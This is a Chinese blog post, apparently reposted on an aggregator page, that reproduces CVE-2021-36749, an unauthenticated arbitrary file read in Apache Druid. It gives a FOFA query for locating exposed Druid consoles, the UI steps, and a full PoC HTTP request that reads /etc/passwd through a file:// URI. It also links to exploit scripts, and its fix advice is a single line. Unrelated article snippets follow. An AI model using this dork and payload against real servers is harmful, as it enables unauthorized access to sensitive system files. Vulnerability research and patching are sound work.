Adminxe
Adminxe

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第1张图片

0x00 漏洞详情

由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP
InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

0x01 fofa语法

title="Apache Druid"

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第2张图片

0x02 漏洞复现

主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://协议进行读取)

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第3张图片

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第4张图片

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第5张图片

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第6张图片

file:///etc/passwd

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第7张图片

POC:

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 413
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://127.0.0.1:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞_第8张图片

0x03 利用脚本

  • https://github.com/BrucessKING/CVE-2021-36749/blob/main/CVE-2021-36749.py
  • https://github.com/dorkerdevil/CVE-2021-36749/blob/main/CVE-2021-36749.py

0x04 修复方法

升级版本,设置访问权限

转载请注明:Adminxe's Blog » 【漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

你可能感兴趣的:(漏洞复现,CVE-2021-36749,Apache,Druid,任意文件读取漏洞)

  • WordPress Hunk Companion插件节点逻辑缺陷导致Rce漏洞复现(CVE-2024-9707)(附脚本) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:WordPressHunkCompanion是一款专为ThemeHunk开发的WordPress主题设计的插件,旨在增强主题功能并提
  • Pocsuite3渗透测试框架编写POC和EXP脚本 wespten 全栈网络安全渗透测试代码审计网络安全工具开发大数据
    在我们的日常渗透测试中,经常挖掘到一些漏洞,但是我们一般使用挖掘工具或者手工判断的时候,不好确定是不是真的存在这么一个漏洞,因此POC脚本就应运而生了。POC全称是ProofofConcept,中文译作概念验证。它是专门为了验证漏洞是否真的存在的脚本。而EXP全称是Exploit,中文译作漏洞利用程序。它是对POC验证结果的一种漏洞利用脚本。因为市面上有关POC和EXP脚本的教程比较稀少,但是比较
  • RocketMQ源码之消息刷盘分析 小虾米 ~ RocketMQrocketmq
    前言刷盘是将内存中的消息写入磁盘,分为同步刷盘和异步刷盘。同步刷盘指一条消息写入磁盘才返回成功,异步刷盘指写入内存就返回成功,稍后异步线程刷盘。在创建CommitLog对象的时候,会初始化刷盘服务://代码位置:org.apache.rocketmq.store.CommitLogpublicCommitLog(finalDefaultMessageStoredefaultMessageStore
  • 字符串的子串的个数 小虾米 ~
    字串:串中任意个连续的字符组成的子序列称为该串的字串。空串属于字串(1)长度为n的字符串,如果串中字符各不相同,则字串的个数为n(n+1)/2+1解析:包含1个字符的子串共n个包含2个字符的子串共n-1个包含3个字符的子串共n-2个包含4个字符的子串共n-3个.。。。。。包含n个字符的子串共1个空串1个综上所述:子串个数共:1+2+3+。。。+n+1(空串)=n(n+1)/2+1(2)串中字符出现
  • 可达鸭J3题目 拦截导弹 可达鸭s15192 算法可达鸭coduck可达鸭·勰码教育
    题目描述某国为了防御敌国的导弹袭击,发展出一种导弹拦截系统。但是这种导弹拦截系统有一个缺陷:虽然它的第一发炮弹能够到达任意的高度,但是以后每一发炮弹都不能高于前一发的高度。某天,雷达捕捉到敌国的导弹来袭。由于该系统还在试用阶段,所以只有一套系统,因此有可能不能拦截所有的导弹。输入导弹依次飞来的高度(雷达给出的高度数据是不大于30000的正整数,导弹数不超过1000),计算这套系统最多能拦截多少导弹
  • C++ 条件变量-生产消费者模型 __雨夜星辰__ c++开发语言学习笔记多线程
    条件变量是一种线程同步机制,当条件不满足时,相关线程被一直阻塞,直到某种条件出现,这些线程才会被唤醒.C++11的条件变量提供了两个类:condition_variable:只支持与普通mutex搭配,效率更高。condition_variable_any:是一种通用的条件变量,可以与任意mutex搭配(包括用户自定义的锁类型)包含头文件:1.condition_variable类主要成员函数:1
  • 2024年社区高光时刻总结! 数据库
    亲爱的朋友们,让我们把时间的快门按下,一起回顾这一年的点点滴滴。就像翻阅一本精彩的相册,每一张照片都记录着我们ApacheDolphinScheduler社区的欢笑和泪水。那么,准备好了吗?让我们一起跳进时光机,回顾社区里2024年那些难忘的瞬间吧!时光荏苒,新年将至,2025年,愿我们所有人的梦想照进现实,愿所有愿美好如期而至!本文由白鲸开源科技提供发布支持!
  • Apache DolphinScheduler 限制秒级别的定时调度 数据库
    背景ApacheDolphinScheduler定时任务配置采用的7位Crontab表达式,分别对应秒、分、时、月天、月、周天、年。在团队日常开发工作中,工作流的定时调度一般不会细化到秒级别。但历史上出现过因配置的疏忽大意而产生故障时间,如应该配置每分钟执行的工作流被配置长了每秒执行,造成短时间内产生大量工作流实例,对ApacheDolphinScheduler服务可用性和提交任务的Hadoop集
  • Spring Boot HikariCP数据库连接池入门 m0_74824076 面试学习路线阿里巴巴springboot数据库后端
    1.概述在我们的项目中,数据库连接池基本是必不可少的组件。在目前数据库连接池的选型中,主要是Druid,为监控而生的数据库连接池。HikariCP,号称性能最好的数据库连接池。至于怎么选择,两者都非常优秀,不用过多纠结。SpringBoot2.X版本,默认采用HikariCP。阿里大规模采用Druid。当然,如下有一些资料,胖友可以阅读参考:《Druid连接池介绍》《为什么HikariCP被号称为
  • Hadoop是什么,怎么部署安装? 狮歌~资深攻城狮 hadoop大数据分布式
    Hadoop是什么?Hadoop是一个由Apache基金会开发的开源分布式系统基础架构,主要用于处理和存储大规模数据集。它包括两个核心组件:Hadoop分布式文件系统(HDFS)和HadoopYARN(YetAnotherResourceNegotiator)。HDFS提供了一个高吞吐量的数据访问接口,允许用户在集群中存储大量数据。它通过将文件分割成多个块并分布在集群的不同节点上来实现高可靠性和可
  • 目前碰到的服务器并发性能问题 James506 ServerACE服务器LoadRunner并发性能APACHE
    背景:采用APACHE+PHP+ACE构建了一个服务器。ACE采用的是TP_Reactor框架。PHP和ACE之间采用SOCKET进行通信,PHP建立不了长连接,每次请求连接,处理完毕断开。APACHE+PHP部署在一台服务器,ACE部署在另一台服务器。问题:采用loadrunner进行性能测试时,发现并发上不去,以为是资源不够,查看服务器后,发现各服务器的CPU和内存资源都有空余,特别是ACE的
  • python超时退出进程_长时间运行进程的超时和Windows服务(Python) 拉菲雪球兔 python超时退出进程
    将服务用作具有多个线程的控制器。一个线程(Main)应该同步和排队命令,并使用win32serviceframework进行通信、注册到系统等。另一个线程(Worker)应该等待来自队列的命令并执行它们。如果您将任意代码作为单独的进程执行,那么您可以从工作线程中派生这些代码,并在它们完成后简单地读回结果并进行清理。在这样,当一个stop到达时,您的主线程将把它注册到它队列中的worker,它将唤醒
  • mybatis学习(14/134) 一缕叶 mybatismybatis学习
    packagecom.power.mybatsi.test;importorg.apache.ibatis.io.Resources;importorg.apache.ibatis.session.SqlSession;importorg.apache.ibatis.session.SqlSessionFactory;importorg.apache.ibatis.session.SqlSessi
  • 跨平台物联网漏洞挖掘算法评估框架设计与实现项目概述与调整 XLYcmy 漏洞挖掘网络安全漏洞挖掘物联网跨架构静态检测项目报告二进制
    1.1项目研究目的与创新点复述1.1.1.研究目的本研究的研究目的主要有以下两个:1、基于此领域的相关方法,通过实验找出各个架构的最优方法2、通过设计实验,比较跨架构解决方案和各架构最优方法组合解决方案在函数识别、漏洞挖掘上的优劣性1.1.2.创新点1、通过构建数据集和设计实验,本研究汇总性地得到各个架构下物联网漏洞挖掘静态方法的最优方法2、在以往的研究中,只是做了某个架构内或者跨架构方法之间的比
  • Flask SSTI注入:探索模板注入漏洞 NfsVerilog flaskpython后端
    简介在Web应用程序开发中,安全性是至关重要的。然而,有时候由于不正确的输入验证或者配置设置,可能会导致安全漏洞的存在。在本文中,我们将探讨一种常见的Web应用程序漏洞——Flask中的SSTI(服务器端模板注入)注入。我们将介绍SSTI注入的原理,展示它的危害,并提供一些防御措施。什么是SSTI注入?SSTI(Server-SideTemplateInjection)注入是一种Web应用程序漏洞
  • 网络安全渗透测试的八个步骤 披荆斩棘的GG 学习路线Web安全网络安全web安全网络安全
    一、明确目标1.确定范围:测试目标的范畴、ip、网站域名、内外网、检测帐户。2.确定标准:能渗入到何种程度,所花费的时间、能不能改动提交、能不能漏洞利用、这些。3.确定要求:web应用的漏洞、业务逻辑漏洞、工作人员管理权限管理漏洞、这些。二、信息收集1.方法:积极扫描仪,开放搜索等。2.开放搜索:使用百度搜索引擎得到:后台管理、未经授权网页页面、比较敏感url、这些。3.基础信息:IP、子网、网站
  • 【STL】list 双向循环链表的使用介绍 VigorousVoyager‌ STLC++c++list链表数据结构STL
    STL中list容器的详细使用说明一.list的文档介绍二.list的构造函数三.list中的访问与遍历操作四.list中的修改操作4.1list中的各种修改操作4.2list的迭代器失效问题五.list中的其他一些操作一.list的文档介绍list是可以在常数范围内在任意位置进行插入和删除的序列式容器,并且该容器可以前后双向迭代。list的底层是双向链表结构,双向链表中每个元素存储在互不相关的独
  • 魔兽地图编辑器实现英雄选择的四种方法 百口可乐__ 魔兽地图编辑器付费WorldEditer
    小精灵选择英雄在地图上建立一个新英雄,更改其玩家为中立无敌意用地区面板在英雄的位置添加一个狭小的地区新建一个触发器,触发事件为单位进入该区域触发条件是进入区域的单位是小精灵执行的动作是,将该区域中的中立被动的任意英雄单位,改变为玩家所属,并且改变颜色建立特效
  • Python之函数中的位置可变参数和关键字可变参数 静星辰
    1.位置可变参数(*)在形式参数名称前加一个星号*,则代表使用该形式参数可以接收任意多个参数,而且接收的参数将会以元组的方式组织。例:deffunc(*args):#arg形参以元组的方式组织传入的实参print(args)func(1,6,"ab","gh")运行结果:(1,6,‘ab’,‘gh’)2.关键字可变参数(**)在形式参数名称前加两个星号**,则代表使用该形式参数可以接收任意多个传入
  • RuoYi(若依)框架的介绍与基本使用(超详细分析) 涔溪 前端框架ruoyi
    **RuoYi(若依)**是一个基于SpringBoot和SpringCloud的企业级快速开发平台。它集成了多种常用的技术栈和中间件,旨在帮助企业快速构建稳定、高效的应用系统。以下是关于RuoYi框架的详细介绍和基本使用教程,涵盖了从环境搭建到核心功能的使用。RuoYi框架简介1.技术栈后端技术:SpringBoot,MyBatis,Druid,Redis,Shiro/SpringSecurit
  • 确定电机极对数的两种方法 GivemeAK 嵌入式硬件
    目前检索到的两种方法:方法1:旋转电机观测任意两相的波形【BLDC】使用示波器测量无刷电机极对数_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1iY411377Z/?spm_id_from=333.337.search-card.all.click&vd_source=0cac5d2ea8bab18974778b90331f9f30示波器上有几个脉冲
  • JavaScript系列(38)-- WebRTC技术详解 陳沉辰陈 JavaScriptjavascriptwebrtc开发语言
    JavaScriptWebRTC技术详解今天,让我们深入了解WebRTC(WebReal-TimeCommunication)技术,这是一种支持网页浏览器进行实时语音对话或视频对话的技术。WebRTC基础概念小知识:WebRTC是一个开源项目,旨在使得浏览器能够进行实时音视频通信,而无需安装任何插件。它不仅支持音视频传输,还支持任意数据的点对点传输。基本实现//1.WebRTC连接管理器class
  • 七.网络模型 Kylin524 运筹学python
    最小(支撑)树问题最小部分树求解:破圈法:任取一圈,去掉圈中最长边,直到无圈;加边法:取图G的n个孤立点{v1,v2,…,vn}作为一个支撑图,从最短边开始往支撑图中添加,见圈回避,直到连通(有n-1条边)最短路问题求最短路有两种算法:求从某一点至其它各点之间最短离的狄克斯屈拉(Dijkstra)算法求网络图上任意两点之间最短路的Floyd(弗洛伊德)矩阵算法最短路问题的数学模型最大流问题:最大流
  • java微服务中消息队列处理中间件基础语法学习,零基础学习 慧香一格 学习消息队列javajava中间件消息队列处理
    在Java微服务中,消息队列处理中间件可以帮助实现服务之间的异步通信、解耦和负载均衡。常用的Java消息队列工具包括RabbitMQ、ApacheKafka和ActiveMQ。下面我将详细介绍这些消息队列工具在Java中的基础语法和使用方法。1.RabbitMQRabbitMQ是一个广泛使用的开源消息代理软件,支持多种协议(AMQP、MQTT、STOMP等)。我们可以使用SpringAMQP来简化
  • org.apache.dolphinscheduler.common.utils.HttpUtils:[73] - null: Name or service no 海豚调度器出现的调度状态问题! 松醪 clouderahadoop
    【DolphinScheduler】org.apache.dolphinscheduler.common.utils.HttpUtils:[73]-null:Nameorservicenotknownjava.net.UnknownHostException:null:Nameorservicenotknown问题描述DolphinScheduler在执行时,遇到的问题,任务已经执行成功,但是调度
  • Arm64架构的Linux服务器安装tomcat并部署war包 木枫Free 服务器架构linuxtomcatarm运维
    一、下载Tomcat打开浏览器,访问ApacheTomcat官方网站。在下载页面中,选择适合arm64架构的版本。一般来说,可以选择Tomcat的二进制发行版(BinaryDistributions)中的.tar.gz压缩包。我这里下载的是tomcat9二、安装Tomcat将下载的Tomcat压缩包上传到欧鹏操作系统的服务器上,或者使用命令行工具(如wget)直接下载到服务器上。解压Tomcat压
  • 一文大白话讲清楚Node文件系统(filesystem)的应用 16年上任的CTO nodenode.jsfilesystemnode文件系统node文件操作
    文章目录一文大白话讲清楚Node文件系统(filesystem)的应用1.啥是Node的文件系统1.1啥是fs1.2fs的文件属性1.2.1权限位mode1.2.2标识位1.2.3文件描述1.3文件操作方法1.3.1文件读取readFile(url,options,callback)和readFileSync(url,options)1.3.2文件写入writeFileSync(url,data,
  • 为什么你的网站总是有安全漏洞 16年上任的CTO 网络安全安全漏洞网络安全web安全安全性测试前端服务器
    目录一、什么是安全漏洞二、安全漏洞的一般表象1.网站瘫痪2.链接指向篡改3.数据篡改4.挂入黑链5.信息泄露6.横向攻击7.流量损耗8.其他现象三、造成安全漏洞的原因1.SQL注入漏洞2.验证码前端校验3.表单重复提交4.文件上传格式校验不合格5.第三方框架的固有漏洞6.密码缺省7.端口开放太多8.Options不过滤9.XSS,CSRF漏洞10.X-Frame-Options劫持11.HTTP获
  • 1月更新 | 国内可用的 ChatGPT 中文版镜像网站攻略合集
    一、ChatGPT镜像网站①ChatGPT中文版支持4o以及o1,支持MJ绘画②ChatGPT镜像网站支持通用全模型,支持文件读取、插件、绘画、AIPPT③ChatGPT工具站收集各种可以用的ChatGPT镜像网站,免费的收费的。1.什么是ChatGPT镜像网站ChatGPT镜像网站(ChatGPTMirrorSite)是指通过复制原始网站内容和结构,创建的备用网站。其主要目的是在原始网站无法访问
  • P1035 [NOIP2002 普及组] 级数求和 沉睡的雄虱 算法c++
    本文主要是分享解决题目的思路题目描述[NOIP2002普及组]级数求和-洛谷已知:Sn=1+12+13+…+1nSn=1+21+31+…+n1。显然对于任意一个整数kk,当nn足够大的时候,Sn>kSn>k。现给出一个整数kk,要求计算出一个最小的nn,使得Sn>kSn>k。输入格式一个正整数kk。输出格式一个正整数nn。输入输出样例输入#1复制1输出#1复制2说明/提示【数据范围】对于100%1
  • Spring4.1新特性——Spring MVC增强 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • mysql 性能查询优化 annan211 javasql优化mysql应用服务器
    1 时间到底花在哪了? mysql在执行查询的时候需要执行一系列的子任务,这些子任务包含了整个查询周期最重要的阶段,这其中包含了大量为了 检索数据列到存储引擎的调用以及调用后的数据处理,包括排序、分组等。在完成这些任务的时候,查询需要在不同的地方 花费时间,包括网络、cpu计算、生成统计信息和执行计划、锁等待等。尤其是向底层存储引擎检索数据的调用操作。这些调用需要在内存操
  • windows系统配置 cherishLC windows
    删除Hiberfil.sys :使用命令powercfg -h off 关闭休眠功能即可: http://jingyan.baidu.com/article/f3ad7d0fc0992e09c2345b51.html 类似的还有pagefile.sys msconfig 配置启动项 shutdown 定时关机 ipconfig 查看网络配置 ipconfig /flushdns
  • 人体的排毒时间 Array_06 工作
    ======================== ||  人体的排毒时间是什么时候?|| ======================== 转载于: http://zhidao.baidu.com/link?url=ibaGlicVslAQhVdWWVevU4TMjhiKaNBWCpZ1NS6igCQ78EkNJZFsEjCjl3T5EdXU9SaPg04bh8MbY1bR
  • ZooKeeper cugfy zookeeper
    Zookeeper是一个高性能,分布式的,开源分布式应用协调服务。它提供了简单原始的功能,分布式应用可以基于它实现更高级的服务,比如同步, 配置管理,集群管理,名空间。它被设计为易于编程,使用文件系统目录树作为数据模型。服务端跑在java上,提供java和C的客户端API。 Zookeeper是Google的Chubby一个开源的实现,是高有效和可靠的协同工作系统,Zookeeper能够用来lea
  • 网络爬虫的乱码处理 随意而生 爬虫网络
    下边简单总结下关于网络爬虫的乱码处理。注意,这里不仅是中文乱码,还包括一些如日文、韩文 、俄文、藏文之类的乱码处理,因为他们的解决方式 是一致的,故在此统一说明。     网络爬虫,有两种选择,一是选择nutch、hetriex,二是自写爬虫,两者在处理乱码时,原理是一致的,但前者处理乱码时,要看懂源码后进行修改才可以,所以要废劲一些;而后者更自由方便,可以在编码处理
  • Xcode常用快捷键 张亚雄 xcode
    一、总结的常用命令:     隐藏xcode command+h     退出xcode command+q     关闭窗口 command+w     关闭所有窗口 command+option+w     关闭当前
  • mongoDB索引操作 adminjun mongodb索引
    一、索引基础:    MongoDB的索引几乎与传统的关系型数据库一模一样,这其中也包括一些基本的优化技巧。下面是创建索引的命令:    > db.test.ensureIndex({"username":1})    可以通过下面的名称查看索引是否已经成功建立: &nbs
  • 成都软件园实习那些话 aijuans 成都 软件园 实习
    无聊之中,翻了一下日志,发现上一篇经历是很久以前的事了,悔过~~   断断续续离开了学校快一年了,习惯了那里一天天的幼稚、成长的环境,到这里有点与世隔绝的感觉。不过还好,那是刚到这里时的想法,现在感觉在这挺好,不管怎么样,最要感谢的还是老师能给这么好的一次催化成长的机会,在这里确实看到了好多好多能想到或想不到的东西。   都说在外面和学校相比最明显的差距就是与人相处比较困难,因为在外面每个人都
  • Linux下FTP服务器安装及配置 ayaoxinchao linuxFTP服务器vsftp
    检测是否安装了FTP [root@localhost ~]# rpm -q vsftpd 如果未安装:package vsftpd is not installed  安装了则显示:vsftpd-2.0.5-28.el5累死的版本信息   安装FTP 运行yum install vsftpd命令,如[root@localhost ~]# yum install vsf
  • 使用mongo-java-driver获取文档id和查找文档 BigBird2012 driver
    注:本文所有代码都使用的mongo-java-driver实现。   在MongoDB中,一个集合(collection)在概念上就类似我们SQL数据库中的表(Table),这个集合包含了一系列文档(document)。一个DBObject对象表示我们想添加到集合(collection)中的一个文档(document),MongoDB会自动为我们创建的每个文档添加一个id,这个id在
  • JSONObject以及json串 bijian1013 jsonJSONObject
    一.JAR包简介     要使程序可以运行必须引入JSON-lib包,JSON-lib包同时依赖于以下的JAR包:     1.commons-lang-2.0.jar     2.commons-beanutils-1.7.0.jar     3.commons-collections-3.1.jar &n
  • [Zookeeper学习笔记之三]Zookeeper实例创建和会话建立的异步特性 bit1129 zookeeper
    为了说明问题,看个简单的代码,   import org.apache.zookeeper.*; import java.io.IOException; import java.util.concurrent.CountDownLatch; import java.util.concurrent.ThreadLocal
  • 【Scala十二】Scala核心六:Trait bit1129 scala
    Traits are a fundamental unit of code reuse in Scala. A trait encapsulates method and field definitions, which can then be reused by mixing them into classes. Unlike class inheritance, in which each c
  • weblogic version 10.3破解 ronin47 weblogic
    版本:WebLogic Server 10.3 说明:%DOMAIN_HOME%:指WebLogic Server 域(Domain)目录 例如我的做测试的域的根目录 DOMAIN_HOME=D:/Weblogic/Middleware/user_projects/domains/base_domain 1.为了保证操作安全,备份%DOMAIN_HOME%/security/Defa
  • 求第n个斐波那契数 BrokenDreams
            今天看到群友发的一个问题:写一个小程序打印第n个斐波那契数。         自己试了下,搞了好久。。。基础要加强了。           &nbs
  • 读《研磨设计模式》-代码笔记-访问者模式-Visitor bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; interface IVisitor { //第二次分派,Visitor调用Element void visitConcret
  • MatConvNet的excise 3改为网络配置文件形式 cherishLC matlab
    MatConvNet为vlFeat作者写的matlab下的卷积神经网络工具包,可以使用GPU。 主页: http://www.vlfeat.org/matconvnet/ 教程: http://www.robots.ox.ac.uk/~vgg/practicals/cnn/index.html 注意:需要下载新版的MatConvNet替换掉教程中工具包中的matconvnet: http
  • ZK Timeout再讨论 chenchao051 zookeepertimeouthbase
    http://crazyjvm.iteye.com/blog/1693757 文中提到相关超时问题,但是又出现了一个问题,我把min和max都设置成了180000,但是仍然出现了以下的异常信息: Client session timed out, have not heard from server in 154339ms for sessionid 0x13a3f7732340003
  • CASE WHEN 用法介绍 daizj sqlgroup bycase when
    CASE WHEN 用法介绍 1. CASE WHEN 表达式有两种形式 --简单Case函数  CASE sex  WHEN '1' THEN '男'  WHEN '2' THEN '女'  ELSE '其他' END  --Case搜索函数  CASE WHEN sex = '1' THEN
  • PHP技巧汇总:提高PHP性能的53个技巧 dcj3sjt126com PHP
    PHP技巧汇总:提高PHP性能的53个技巧  用单引号代替双引号来包含字符串,这样做会更快一些。因为PHP会在双引号包围的字符串中搜寻变量,  单引号则不会,注意:只有echo能这么做,它是一种可以把多个字符串当作参数的函数译注:  PHP手册中说echo是语言结构,不是真正的函数,故把函数加上了双引号)。  1、如果能将类的方法定义成static,就尽量定义成static,它的速度会提升将近4倍
  • Yii框架中CGridView的使用方法以及详细示例 dcj3sjt126com yii
    CGridView显示一个数据项的列表中的一个表。 表中的每一行代表一个数据项的数据,和一个列通常代表一个属性的物品(一些列可能对应于复杂的表达式的属性或静态文本)。  CGridView既支持排序和分页的数据项。排序和分页可以在AJAX模式或正常的页面请求。使用CGridView的一个好处是,当用户浏览器禁用JavaScript,排序和分页自动退化普通页面请求和仍然正常运行。 实例代码如下:
  • Maven项目打包成可执行Jar文件 dyy_gusi assembly
    Maven项目打包成可执行Jar文件 在使用Maven完成项目以后,如果是需要打包成可执行的Jar文件,我们通过eclipse的导出很麻烦,还得指定入口文件的位置,还得说明依赖的jar包,既然都使用Maven了,很重要的一个目的就是让这些繁琐的操作简单。我们可以通过插件完成这项工作,使用assembly插件。具体使用方式如下: 1、在项目中加入插件的依赖: <plugin>
  • php常见错误 geeksun PHP
    1.  kevent() reported that connect() failed (61: Connection refused) while connecting to upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastc
  • 修改linux的用户名 hongtoushizi linuxchange password
    Change Linux Username 更改Linux用户名,需要修改4个系统的文件: /etc/passwd /etc/shadow /etc/group /etc/gshadow 古老/传统的方法是使用vi去直接修改,但是这有安全隐患(具体可自己搜一下),所以后来改成使用这些命令去代替: vipw vipw -s vigr vigr -s   具体的操作顺
  • 第五章 常用Lua开发库1-redis、mysql、http客户端 jinnianshilongnian nginxlua
    对于开发来说需要有好的生态开发库来辅助我们快速开发,而Lua中也有大多数我们需要的第三方开发库如Redis、Memcached、Mysql、Http客户端、JSON、模板引擎等。 一些常见的Lua库可以在github上搜索,https://github.com/search?utf8=%E2%9C%93&q=lua+resty。   Redis客户端 lua-resty-r
  • zkClient 监控机制实现 liyonghui160com zkClient 监控机制实现
             直接使用zk的api实现业务功能比较繁琐。因为要处理session loss,session expire等异常,在发生这些异常后进行重连。又因为ZK的watcher是一次性的,如果要基于wather实现发布/订阅模式,还要自己包装一下,将一次性订阅包装成持久订阅。另外如果要使用抽象级别更高的功能,比如分布式锁,leader选举
  • 在Mysql 众多表中查找一个表名或者字段名的 SQL 语句 pda158 mysql
    在Mysql 众多表中查找一个表名或者字段名的 SQL 语句:   方法一:SELECT table_name, column_name from information_schema.columns WHERE column_name LIKE 'Name';   方法二:SELECT column_name from information_schema.colum
  • 程序员对英语的依赖 Smile.zeng 英语程序猿
    1、程序员最基本的技能,至少要能写得出代码,当我们还在为建立类的时候思考用什么单词发牢骚的时候,英语与别人的差距就直接表现出来咯。 2、程序员最起码能认识开发工具里的英语单词,不然怎么知道使用这些开发工具。 3、进阶一点,就是能读懂别人的代码,有利于我们学习人家的思路和技术。 4、写的程序至少能有一定的可读性,至少要人别人能懂吧... 以上一些问题,充分说明了英语对程序猿的重要性。骚年
  • Oracle学习笔记(8) 使用PLSQL编写触发器 vipbooks oraclesql编程活动Access
        时间过得真快啊,转眼就到了Oracle学习笔记的最后个章节了,通过前面七章的学习大家应该对Oracle编程有了一定了了解了吧,这东东如果一段时间不用很快就会忘记了,所以我会把自己学习过的东西做好详细的笔记,用到的时候可以随时查找,马上上手!希望这些笔记能对大家有些帮助!     这是第八章的学习笔记,学习完第七章的子程序和包之后
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他